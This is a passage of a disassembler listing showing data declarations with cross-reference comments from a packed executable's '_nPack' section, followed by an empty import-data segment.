dword_496E04 dd 95000h ; DATA XREF: sub_496410�r
dword_496E08 dd 961B0h ; DATA XREF: start+1E�r
dword_496E0C dd 0 ; DATA XREF: sub_49627A+6D�r
; sub_49627A+B2�r ...
dd 0
dword_496E14 dd 0 ; DATA XREF: sub_4968C5+16�r
byte_496E18 db 74h ; DATA XREF: sub_49627A+128�r
align 4
byte_496E1C db 1 ; DATA XREF: sub_49627A+50�r
align 10h
dd 0
dword_496E24 dd 0 ; DATA XREF: sub_496819+3C�r
dword_496E28 dd 0 ; DATA XREF: sub_496819+36�r
; sub_496819+53�r
dword_496E2C dd 0 ; DATA XREF: sub_496819+1E�w
dword_496E30 dd 0 ; DATA XREF: sub_496819+77�r
dword_496E34 dd 0 ; DATA XREF: sub_496819+4D�r
align 10h
dword_496E40 dd 77E79E34h ; DATA XREF: sub_49620A+2B�w
; sub_49623C+35�r ...
dword_496E44 dd 77E7980Ah ; DATA XREF: sub_49620A+23�w
; sub_49623C+D�r ...
dword_496E48 dd 400000h ; DATA XREF: start+24�w start+3D�r ...
dword_496E4C dd 1 ; DATA XREF: start�r start+42�w
dword_496E50 dd 0 ; DATA XREF: sub_496819+19�r
; sub_496819+23�r
dword_496E54 dd 1 ; DATA XREF: sub_496819+6B�w
dword_496E58 dd 0 ; DATA XREF: sub_496819:loc_49687A�r
dword_496E5C dd 0 ; DATA XREF: sub_496819+7D�r
dword_496E60 dd 0 ; DATA XREF: sub_496819+88�r
dword_496E64 dd 0 ; DATA XREF: sub_496819+82�r
align 200h
_nPack ends
; Section 6. (virtual address 00097000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00097000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 497000h
align 2000h
_idata2 ends
end start